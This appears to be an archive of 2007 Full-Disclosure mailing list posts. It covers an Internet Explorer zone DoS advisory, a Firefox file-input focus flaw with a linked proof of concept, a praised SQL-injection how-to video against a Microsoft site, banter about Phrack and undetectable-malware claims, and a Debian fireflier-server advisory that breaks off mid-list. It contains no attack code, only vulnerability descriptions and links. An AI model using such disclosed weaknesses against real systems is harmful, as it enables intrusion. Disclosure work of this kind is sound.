From zeroknock at secniche.org Sun Jul 1 17:53:42 2007 From: zeroknock at secniche.org (Aditya K Sood) Date: Sun, 01 Jul 2007 09:53:42 -0700 Subject: [Full-disclosure] Advisory : Internet Explorer Zone Domain Specification Dos and Page suppressing. Message-ID: <4687DC16.1030000@secniche.org> Advisory : Internet Explorer Zone Domain Specification Dos and Page Suppressing Severity : Intermediate Version : IE 6.0 - 7.0 Dated : 18 June 2007 Explanation: The vulnerability is present in handling of domain names with different parameters [ sub domains] when specified in the Intranet zone and Restricted zone with different characters [* ,.]. TheInternet Explorer show weird behavior in opening of those websites. The problem occurs in loading of those websites there by resulting in DoS through the browser. The problem occurs in resolving domain names in different zones by the explorer. It can be launched remotely by a malicious attacker by exploiting this vulnerable behavior through a rogue script and registry functions. The problem persists if rogue entries or manipulated entries are subjected into various zones. So when a new instance of IE is loaded , the registry entries are triggered up there by resulting in security impacts. The website page gets suppressed. The page gets hanged for sometime , there by showing a delay in loading of website and affects the CPU load. Vendor Status : Reported To Microsoft Security Center. Solution By Microsoft Security Center: 1. Avoid visiting untrusted Websites. 2. Script Restriction should be applied. ----- Aditya K Sood http://www.secniche.org From zeroknock at secniche.org Sun Jul 1 19:59:12 2007 From: zeroknock at secniche.org (Aditya K Sood) Date: Sun, 01 Jul 2007 11:59:12 -0700 Subject: [Full-disclosure] DOS on phrack? In-Reply-To: <4685F3A5.6010902@bellsouth.net> References: <4685F3A5.6010902@bellsouth.net> Message-ID: <4687F980.5090106@secniche.org> Yup scott the problem is there. Regards Aditya K Sood http://www.secniche.org scott wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > It seems that Phrack.org is experiencing a serious DoS.I tried a few > times to connect today to no avail. > > Not to increase traffic to the DoS,is anyone else also experiencing the > same? > > Regards, > Scott > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iD8DBQFGhfOkelSgjADJQKsRAlD5AKCNo2L7RsiiERAyDYZ53i61duWA6QCdEtqw > NeYfdpD6AZEoMSGVmClNCWA= > =nimg > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From ascii at katamail.com Sun Jul 1 02:17:41 2007 From: ascii at katamail.com (ascii) Date: Sun, 01 Jul 2007 03:17:41 +0200 Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities In-Reply-To: References: Message-ID: <468700B5.7080202@katamail.com> carl hardwick wrote: > PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html > > The vulnerability allows the attacker to silently redirect focus of > selected key press events to an otherwise protected file upload form > field. This is possible because of how onKeyDown event is handled, > allowing the focus to be moved between the two. This enables the > attacker to read arbitrary files on victim's system. many thanks for sharing this : ) it's a pretty serious vulnerability as said by Zalewski regards, Francesco `ascii` Ongaro http://www.ush.it From tyoptyop at gmail.com Sun Jul 1 00:17:57 2007 From: tyoptyop at gmail.com (Guasconi Vincent) Date: Sun, 1 Jul 2007 01:17:57 +0200 Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities In-Reply-To: References: Message-ID: <985b1a3d0706301617y6d8d7933m1b5ca8ff52d726b0@mail.gmail.com> On 6/30/07, carl hardwick wrote: > New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities: > This demo is very simple. when you input some text in the textarea, > the file input element's value will also change to it. I tested it on > Firefox 1.5.0.12 and 2.0.0.4. > > PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html Is there a link between your POC and this : http://lcamtuf.coredump.cx/focusbug/ ? > credits by - Hong mmmhh... -- Guasconi Vincent Etudiant. http://altmylife.blogspot.com From tyoptyop at gmail.com Sun Jul 1 00:26:38 2007 From: tyoptyop at gmail.com (Guasconi Vincent) Date: Sun, 1 Jul 2007 01:26:38 +0200 Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities In-Reply-To: <468700B5.7080202@katamail.com> References: <468700B5.7080202@katamail.com> Message-ID: <985b1a3d0706301626s37d60e9cv1d7f677c56daac20@mail.gmail.com> On 7/1/07, ascii wrote: > carl hardwick wrote: >> PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html >> The vulnerability allows the attacker to silently redirect focus >> [...] > > many thanks for sharing this : ) > it's a pretty serious vulnerability as said by Zalewski Pretty serious for you, me, and some others. 0.02$ that it will never be patched. -- Guasconi Vincent Etudiant. http://altmylife.blogspot.com From tyoptyop at gmail.com Sun Jul 1 00:33:28 2007 From: tyoptyop at gmail.com (Guasconi Vincent) Date: Sun, 1 Jul 2007 01:33:28 +0200 Subject: [Full-disclosure] Month of Random Hashes: DAY SEVENTEEN In-Reply-To: <597552.86081.qm@web38006.mail.mud.yahoo.com> References: <20070630062356.9CA17DA820@mailserver8.hushmail.com> <597552.86081.qm@web38006.mail.mud.yahoo.com> Message-ID: <985b1a3d0706301633x6f670462ya8a3368f5e2cc9d2@mail.gmail.com> On 6/30/07, Leet Sixteen wrote: > can someone please explain why a bunch of random > hashes are posted everyday in this mailing list? > > what is the significance of the random hashes and why > should i read them everday? 42 -- Guasconi Vincent Etudiant. http://altmylife.blogspot.com From jam at zoidtechnologies.com Sun Jul 1 02:06:20 2007 From: jam at zoidtechnologies.com (Jeff MacDonald) Date: Sat, 30 Jun 2007 21:06:20 -0400 Subject: [Full-disclosure] DOS on phrack? In-Reply-To: <4685F3A5.6010902@bellsouth.net> References: <4685F3A5.6010902@bellsouth.net> Message-ID: <200706302106.21784.jam@zoidtechnologies.com> On Saturday 30 June 2007 2:09 am, scott wrote: > It seems that Phrack.org is experiencing a serious DoS.I tried a few > times to connect today to no avail. > why is it that when a website is unavailable, the immediate assumption is that is being attacked? regards, -- Jeff MacDonald, Zoid Technologies "Web Applications That Suck Less" From mwollenweber at gmail.com Sun Jul 1 02:28:06 2007 From: mwollenweber at gmail.com (matthew wollenweber) Date: Sat, 30 Jun 2007 21:28:06 -0400 Subject: [Full-disclosure] iPhone Roadblock Message-ID: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com> I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not an Apple nut that buys all things Apple, but after years of "smartphones" that never seemed quite right, the iPhone really seems to have hit the mark. My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum... I'm really interested in hacking up my iPhone. Anything with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a harddrive. I couldn't find any options in iTunes and in linux I only got: Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15 Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc. Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789 Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so? Thanks for any help. -- Matthew Wollenweber mwollenweber at gmail.com | mjw at cyberwart.com www.cyberwart.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070630/420aa8b0/attachment.html From pferrie at symantec.com Sun Jul 1 07:04:24 2007 From: pferrie at symantec.com (Peter Ferrie) Date: Sat, 30 Jun 2007 23:04:24 -0700 Subject: [Full-disclosure] Rutkowska faces '100% undetectable malware' challenge, teasing? References: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com> Message-ID: The problem is that she wants the money upfront, in order to develop the 100% undetectable thing that she doesn't have right now. So that's a problem. ________________________________ From: full-disclosure-bounces at lists.grok.org.uk on behalf of Trey Keifer Sent: Sat 6/30/2007 1:39 PM To: Bipin Gautam Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure]Rutkowska faces '100% undetectable malware' challenge, teasing? Joanna has stated her technical requirements for the challenge and Thom and group has accepted them, so why not turn this into what it really is... a bet. The losing team agrees to pay the other $350,000 - if both groups are really so confident there shouldn't be any issue. On 6/30/07, Bipin Gautam wrote: hi guys, ref: http://blogs.zdnet.com/security/?p=334 so are they teasing by making her the impossible challenge at this date? :) honeypot developers have been trying to battle the same issue of making the virtual machine emulate guest OS like the it is run in real hardware since some years now. ref: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf But if Rutkowska or anyone is able to succeed to make it undetectable in current hardware that would be genius! -bipin _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From redhowlingwolves at bellsouth.net Sun Jul 1 07:56:22 2007 From: redhowlingwolves at bellsouth.net (scott) Date: Sun, 01 Jul 2007 02:56:22 -0400 Subject: [Full-disclosure] Rutkowska faces '100% undetectable malware' challenge, teasing? In-Reply-To: References: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com> Message-ID: <46875016.1060800@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 It sounds to me like you fella's have never to, or even read her website.Ya know,Invisiblethings.org? Maybe you've never heard of Blue Pill.Or Red Pill. Or maybe it's a waste of time to tell you. There are some methods involving timing to detect ,possibly, these types of things,but they are easily defeated. Scott Peter Ferrie wrote: > The problem is that she wants the money upfront, in order to develop the 100% undetectable thing that she doesn't have right now. So that's a problem. > > > ________________________________ > > From: full-disclosure-bounces at lists.grok.org.uk on behalf of Trey Keifer > Sent: Sat 6/30/2007 1:39 PM > To: Bipin Gautam > Cc: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure]Rutkowska faces '100% undetectable malware' challenge, teasing? > > > Joanna has stated her technical requirements for the challenge and Thom and group has accepted them, so why not turn this into what it really is... a bet. > > The losing team agrees to pay the other $350,000 - if both groups are really so confident there shouldn't be any issue. > > > > > On 6/30/07, Bipin Gautam wrote: > > hi guys, > > ref: http://blogs.zdnet.com/security/?p=334 > > so are they teasing by making her the impossible challenge at this date? :) > > honeypot developers have been trying to battle the same issue of > making the virtual machine emulate guest OS like the it is run in real > hardware since some years now. > > ref: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf > > But if Rutkowska or anyone is able to succeed to make it undetectable > in current hardware that would be genius! > > -bipin > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGh1AWelSgjADJQKsRAnNiAJsHt93ydzxXxFTea/Ia9NNayiTYfwCfRew0 roCWGY5bpgK3srMNbwbAvPY= =3trl -----END PGP SIGNATURE----- From redhowlingwolves at bellsouth.net Sun Jul 1 05:17:41 2007 From: redhowlingwolves at bellsouth.net (scott) Date: Sun, 01 Jul 2007 00:17:41 -0400 Subject: [Full-disclosure] DOS on phrack? In-Reply-To: <200706302106.21784.jam@zoidtechnologies.com> References: <4685F3A5.6010902@bellsouth.net> <200706302106.21784.jam@zoidtechnologies.com> Message-ID: <46872AE5.4010308@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Possibly because I am a paranoid phreak who thinks security is a way to get around this problem? Or just maybe I should have added...or just down for maintenance?...to my original post.That way smart asses like yourself wouldn't need to waste their time responding to such a despot as me. Sorry to waste your time so you could waste more time by replying in such an unambiguous way! Ooops.There's my Xanax.I knew I needed it! Bad day.Sorry for the rant.^~^ scott Jeff MacDonald wrote: > why is it that when a website is unavailable, the immediate assumption is that > is being attacked? > > regards, -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGhym+elSgjADJQKsRAnb2AKCHs26MXM13jhcme1niZLgMobnsCACdGlXr 4xLSTKdsdcb5HfMkAfrFgbU= =+9Si -----END PGP SIGNATURE----- From waldoalvarez00 at gmail.com Sun Jul 1 10:29:31 2007 From: waldoalvarez00 at gmail.com (wac) Date: Sun, 1 Jul 2007 05:29:31 -0400 Subject: [Full-disclosure] =?windows-1252?q?Rutkowska_faces_=91100=25_unde?= =?windows-1252?q?tectable_malware=92_challenge=2C_teasing=3F?= In-Reply-To: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com> References: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com> Message-ID: Blah blah blah. Please someone tell Rokowska that we know about what she calls "blue pill" since we where little kids. It was exposed *years ago* (1995 to be exact > 12 years) by Mark A. Ludwig in his Giant Book of Computer viruses Page 391 from American Eagle Publications, Inc. Chapter "Protected mode stealth" Basically was moving the operating system into userland and running the virus in ring-0 making it almost undetectable. It was called Isnt not blue whatever. Yes well with vanderpool technology should be a lot easier given the hardware support. And guess what.. We are still alive even with a POC virus and it's source code available to the public. I hate that kind of noisy sensationalist press so much. That guy is always doing it. And btw I don't believe such thing to be totally undetectable. There's always a little catch. Regards Waldo On 6/30/07, Bipin Gautam wrote: > > hi guys, > > ref: http://blogs.zdnet.com/security/?p=334 > > so are they teasing by making her the impossible challenge at this date? > :) > > honeypot developers have been trying to battle the same issue of > making the virtual machine emulate guest OS like the it is run in real > hardware since some years now. > > ref: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf > > > But if Rutkowska or anyone is able to succeed to make it undetectable > in current hardware that would be genius! > > -bipin > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070701/fb1e9099/attachment.html From hackthegov at googlemail.com Sun Jul 1 15:20:31 2007 From: hackthegov at googlemail.com (HACK THE GOV) Date: Sun, 1 Jul 2007 15:20:31 +0100 Subject: [Full-disclosure] phrack / n3td3v Message-ID: hey hey, is there a connection between these people? curious. we've ruled out gobbles is n3td3v but maybe phrack is n3td3v or n3td3v is phrack. yours hackthegov -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070701/9e4ac5b4/attachment.html From secadmin at netsecdesign.com Sun Jul 1 17:26:35 2007 From: secadmin at netsecdesign.com (Security Admin (NetSec)) Date: Sun, 1 Jul 2007 09:26:35 -0700 Subject: [Full-disclosure] How to compromise a Microosft site using SQL injection In-Reply-To: References: Message-ID: <8D870AB38C30EC4C848A11A3F83D20D806074474F8@exchange2007.mmicmanhomenet.local> http://www.zone-h.org/content/view/14780/31/ Has the explanation, and a place to upload the HOW-TO video (with test explanation) from the hacker, http://www.unbase.com/n/5725974396 Better than any class I have taken on Web application security. It is nice to know that SQL Server 2005 has its issues just like every other database server. BTW, The hacker has a hotmail address in the HOW-TO video for you to contact him :) SecAdmin -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070701/79fde024/attachment.html -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: BitDefender.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070701/79fde024/attachment.txt From kf_lists at digitalmunition.com Sun Jul 1 18:34:37 2007 From: kf_lists at digitalmunition.com (Kevin Finisterre (lists)) Date: Sun, 1 Jul 2007 13:34:37 -0400 Subject: [Full-disclosure] iPhone Security Settings In-Reply-To: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> Message-ID: While you are at it... http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/ 061-3538.20070629.B7vXa/iPhone1,1_1.0_1A543a_Restore.ipsw -KF On Jun 29, 2007, at 8:10 PM, John Smith wrote: > http://www.andrew.cmu.edu/user/xsk/iPhoneSecuritySettings.html > > John > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From jam at zoidtechnologies.com Sun Jul 1 18:37:22 2007 From: jam at zoidtechnologies.com (Jeff MacDonald) Date: Sun, 1 Jul 2007 13:37:22 -0400 Subject: [Full-disclosure] DOS on phrack? In-Reply-To: <46872AE5.4010308@bellsouth.net> References: <4685F3A5.6010902@bellsouth.net> <200706302106.21784.jam@zoidtechnologies.com> <46872AE5.4010308@bellsouth.net> Message-ID: <200707011337.23046.jam@zoidtechnologies.com> On Sunday 01 July 2007 12:17 am, scott wrote: > Possibly because I am a paranoid phreak who thinks security is a way to > get around this problem? > well, posting that a website is under an attack without any evidence is a little skimp on details, particularly for this list, don't you think? I was obviously too quick to respond. I shall attempt to be a little more considerate in the future. regards, -- Jeff MacDonald, Zoid Technologies "Web Applications That Suck Less" From skx at debian.org Sun Jul 1 18:56:28 2007 From: skx at debian.org (Steve Kemp) Date: Sun, 1 Jul 2007 18:56:28 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1326-1] New fireflier-server packages fix unsafe temporary files Message-ID: <20070701175628.GA22103@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1326 security at debian.org http://www.debian.org/security/ Steve Kemp July 01, 2007 - ------------------------------------------------------------------------ Package : fireflier-server Vulnerability : insecure temporary files Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-2837 Steve Kemp from the Debian Security Audit project discovered that fireflier-server, an interactive firewall rule creation tool, uses temporary files in an unsafe manner which may be exploited to remove arbitary files from the local system. For the old stable distribution (sarge) this problem has been fixed in version 1.1.5-1sarge1. For the stable distribution (etch) this problem has been fixed in version 1.1.6-3etch1. For the unstable distribution (sid) this problem will be fixed shortly. We recommend that you upgrade your fireflier-server package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GN/Linux 3.1 alias sarge - ------------------------------- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/f/fireflier/fireflier_1.1.5-1sarge1.dsc Size/MD5 checksum: 754 fd653a7d7e2c4475d1a2c2640b3e142a http://security.debian.org/pool/updates/main/f/fireflier/fireflier_1.1.5-1sarge1.tar.gz Size/MD5 checksum: 499949 4ae52e40866c6ca977ddcbf8a8b5fd65 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.5-1sarge1_alpha.deb Size/MD5 checksum: 75194 8c878fe74627e6a6246333d5b14c228f http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.5-1sarge1_alpha.deb Size/MD5 checksum: 177850 027ca26aabb6aafae2acdc748d3f4050 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.5-1sarge1_alpha.deb Size/MD5 checksum: 74840 d5a498e131e51d76f4044218f9298e24 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.5-1sarge1_alpha.deb Size/MD5 checksum: 51402 84350d096372ab3f0aa41608adf3772f amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.5-1sarge1_amd64.deb Size/MD5 checksum: 66538 34a5b65429e8ebdf4646d93ae8fc37c7 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.5-1sarge1_amd64.deb Size/MD5 checksum: 66370 6f3614d84a690531039e5b7b0adc2b6b http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.5-1sarge1_amd64.deb Size/MD5 checksum: 47130 68d9276db6afc61f3eec2091c6e57634 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.5-1sarge1_amd64.deb Size/MD5 checksum: 147046 d0aafacb99d698957a91df99ff6eddd5 arm architecture (ARM) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.5-1sarge1_arm.deb Size/MD5 checksum: 61610 ad9b1e6b0d0532a3494f22e6811798a9 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.5-1sarge1_arm.deb Size/MD5 checksum: 64002 50b762fe9a28aa55bda45d134de95a5e http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.5-1sarge1_arm.deb Size/MD5 checksum: 46878 dc55fb97f5d9a4bf8fc192d7f1f22620 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.5-1sarge1_arm.deb Size/MD5 checksum: 163486 70254f114e19769e74a02f977e70856c i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.5-1sarge1_i386.deb Size/MD5 checksum: 66070 f65bbd16b3b9349271dd643b67fe5fe6 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.5-1sarge1_i386.deb Size/MD5 checksum: 45686 d43fa251a29fde160e5be343ac18a5e8 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.5-1sarge1_i386.deb Size/MD5 checksum: 145080 803aa15f76f167ec61751ab4d4726011 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.5-1sarge1_i386.deb Size/MD5 checksum: 63804 8935c1620e21f806b72ac23567cfde7b ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.5-1sarge1_ia64.deb Size/MD5 checksum: 77904 c6470c91822ba6864b58f901e0ed0415 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.5-1sarge1_ia64.deb Size/MD5 checksum: 57184 d40677eb94d117307e0a2279d6b46b37 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.5-1sarge1_ia64.deb Size/MD5 checksum: 86190 785c0e110f76b92fbf9fecec864ddfdc http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.5-1sarge1_ia64.deb Size/MD5 checksum: 181778 6599a98a4e1bdda9350f336b38d134a5 m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.5-1sarge1_m68k.deb Size/MD5 checksum: 43666 e6bda51d4e19dc5a822d1368cb7a5950 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.5-1sarge1_m68k.deb Size/MD5 checksum: 153246 54e8eb7687c145a29ba5c2f831ef3f58 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.5-1sarge1_m68k.deb Size/MD5 checksum: 67476 656375bc297d17c24cf61287a071b858 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.5-1sarge1_m68k.deb Size/MD5 checksum: 64976 0a277af76d4329a96fba035fa11f951f mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.5-1sarge1_mipsel.deb Size/MD5 checksum: 64736 676d8b2b2937960d3f2201b4009cc728 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.5-1sarge1_mipsel.deb Size/MD5 checksum: 48914 42326fdf138ab674ea5ad26c9f1a6c5e http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.5-1sarge1_mipsel.deb Size/MD5 checksum: 65704 6131b6260d1a5804b993c06d6402607e http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.5-1sarge1_mipsel.deb Size/MD5 checksum: 143918 e2a4420876ce51a371b4c04daf477299 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.5-1sarge1_s390.deb Size/MD5 checksum: 58278 915f54bb4e7bac404a189d9d303ebde1 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.5-1sarge1_s390.deb Size/MD5 checksum: 58024 2c6e553cbf4e7ceedaa3e68dd7c90592 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.5-1sarge1_s390.deb Size/MD5 checksum: 126864 a63df68efa70c549c98a72dda362000b http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.5-1sarge1_s390.deb Size/MD5 checksum: 46378 e3c0faeb7643582a0f86ead593ef3392 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.5-1sarge1_sparc.deb Size/MD5 checksum: 137770 02079ebc00539a25d28c7c3f2323087e http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.5-1sarge1_sparc.deb Size/MD5 checksum: 44604 1f48977051d6b684a97d3bc11849e3d3 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.5-1sarge1_sparc.deb Size/MD5 checksum: 63408 d5849c13c7f841f0779511628604f174 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.5-1sarge1_sparc.deb Size/MD5 checksum: 62406 19d9df652340d502a46bea63631c69b8 Debian GNU/Linux 4.0 alias etch - ------------------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/f/fireflier/fireflier_1.1.6-3etch1.tar.gz Size/MD5 checksum: 615953 7db5f641d31cf389baf0882f2f2288ef http://security.debian.org/pool/updates/main/f/fireflier/fireflier_1.1.6-3etch1.dsc Size/MD5 checksum: 719 8ec24268cc89bb1472dcd4f023109a55 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_alpha.deb Size/MD5 checksum: 147300 c6b3ba67a793555ec96c3714d5028d4e http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_alpha.deb Size/MD5 checksum: 52922 4f29a555ae0c60a283054869a2deef0d http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_alpha.deb Size/MD5 checksum: 76210 db82d7e8c25d5b778bbc22de591f23ae http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_alpha.deb Size/MD5 checksum: 74646 f39baaca7abcf1a64b6920398d545dc0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_amd64.deb Size/MD5 checksum: 68414 9c1c112e4535e71ea86154c861e0b688 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_amd64.deb Size/MD5 checksum: 121268 bdf7ba3b1cce5e9b4a0563c77dc9bd38 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_amd64.deb Size/MD5 checksum: 47430 698f016cb66f731fda7b87b1f192709e http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_amd64.deb Size/MD5 checksum: 67766 84d8735acffe2567fc8c9739788f0fea arm architecture (ARM) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_arm.deb Size/MD5 checksum: 46330 d147b04a73a65fe2966948ac58445cf7 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_arm.deb Size/MD5 checksum: 64868 1af069cf70c678eddaa8e28802df3e89 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_arm.deb Size/MD5 checksum: 130688 f97d13337085b8ade757c1fb10095d6f http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_arm.deb Size/MD5 checksum: 66356 64ef68a531883b23afeacde58e7d2727 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_i386.deb Size/MD5 checksum: 46250 62dde84e79919f2b5d1b2b8a44cedcee http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_i386.deb Size/MD5 checksum: 65748 c908187a9e144b7d3debeb43c611f168 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_i386.deb Size/MD5 checksum: 123604 d14dd2b328d0a5f4886bae8ab388965b http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_i386.deb Size/MD5 checksum: 66552 71aad601121e92cab60380f7d92928e6 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_ia64.deb Size/MD5 checksum: 155964 3989a1a5b59db29ce3b0f16d074ccd6d http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_ia64.deb Size/MD5 checksum: 59392 07e514db9113670e6931f9683efcbfbc http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_ia64.deb Size/MD5 checksum: 85446 3ca0771eb5d1e65a80912772444edd85 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_ia64.deb 